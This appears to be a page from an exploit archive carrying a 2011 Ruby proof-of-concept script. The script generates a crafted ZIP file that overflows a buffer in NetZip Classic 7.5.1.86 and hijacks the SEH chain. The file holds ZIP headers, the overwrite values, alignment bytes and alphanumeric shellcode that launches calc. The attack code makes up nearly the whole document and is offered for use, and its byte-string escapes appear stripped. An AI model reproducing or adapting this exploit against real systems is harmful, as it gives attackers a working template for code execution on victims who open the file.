Home / os / win7

NetZip Classic Buffer Overflow

Posted on 01 February 2011

#
#
#[+]Exploit Title: Exploit Buffer Overflow NetZip Classic(SEH)
#[+]Date: 0130\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://proforma.real.com/real/nzclassic/nzclassic.html
#[+]Version: 7.5.1.86
#[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN
#[+]CVE: N/A
#
#The structure of the zip file has been copied from the exploit CORELAN TEAM.
#Thanks For all Turuial Corelan Team
#
#Created BY C4SS!0 G0M3S
#WWW.INVASAO.COM.BR
#Louredo_@hotmail.com
#
#

def usage()
system("cls")
system("color 4f");
str =
"""


#######   #   ###### ######   #  #############
#        ##   #      #        #  #           #
#      #  #   #      #        #  #           #
#      ###### ###### ######   #  #           #
#         #        #      #   #  #           #
#         #        #      #   #  #           #
#######   #   ###### ######   0  #############


[+]Exploit Buffer Overlfow NetZip Classic 7.5.1.86

[+]Author C4SS!0 G0M3S

[+]E-mail Louredo_@hotmail.com


"""
print str
end
if ARGV.length !=1
usage()
print "[-]Usage: "+$0+" <File Name>
"
print "[-]Exemple: "+$0+" Exploit.zip
"
exit
end
usage()
filename = ARGV[0]
head1 =
"x50x4Bx03x04x14x00x00"+
"x00x00x00xB7xACxCEx34x00x00x00" +
"x00x00x00x00x00x00x00x00" +
"xe4x0f" +
"x00x00x00";

head2 =
"x50x4Bx01x02x14x00x14"+
"x00x00x00x00x00xB7xACxCEx34x00x00x00" +
"x00x00x00x00x00x00x00x00x00"+
"xe4x0f"+
"x00x00x00x00x00x00x01x00"+
"x24x00x00x00x00x00x00x00";

end1 =
"x50x4Bx05x06x00x00x00x00x01x00x01x00"+
"x12x10x00x00"+
"x02x10x00x00"+
"x00x00";

buffer = "x41" * 235
nseh = "x59x40x40x40"
seh = [0x10057A41].pack('V')#
egg = "x41" * 5 #4 INC ECX
egg += "x61" * 6 #6 POPAD
egg += "x04x10" #ADD AL,10
egg += "x98xd1" #CALL EAX
egg += "x41" * 5 #JUNK TO SHELLCODE
puts "              [*]Identifying the length Shellcode

"
sleep(1)
shellcode =
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYKIPVQXIOO3L5FBPXLN9D"+
"46DJTNQ5N0XVQD84XK3M8KL33RXE8L4MUP02XOLSUO92XOFVCKEL3X4NNSM5RNJGJP2ELOOSRJM5M64X"+ #Shellcode WinExec("calc",0)
"USVQ9WQKWLVSPJUT1XJDFWEZUB4O7SLKKUKUURKZP179M1XKMWRP8EKI2M8YSZW7KCJ8OPL0O7SHSPSY"+ #ALPHA BASEADDRESS EAX
"41GL7XXWKLCLNK35O0WQCSTPQY1VSXML5O6L5IQCNMHJUNJL1UUOX7VMIWMWK9PXYKN0QE1OFTNVOMUT"+
"YK7OGT8FOPYLP3K8W5UCOM83KYZA"

puts "              [*]The length is Shellcode: #{shellcode.length}

"
sleep(1)


junk = "x41" * (4064 - (buffer+nseh+seh+egg+shellcode).length)

payload = buffer+nseh+seh+egg+shellcode+junk

payload += ".txt"

exploit_zip = head1+payload+head2+payload+end1
puts "              [*]Creating the File #{filename}

"
sleep(1)
begin

f = File.open(filename,"w")
f.puts exploit_zip
f.close
puts "              [*]The File #{filename} was Created with Success

"
sleep(1)
rescue

puts "              [*]Error When Creating The File #{filename}

"
exit

end

 

TOP

Malware :

Exploits :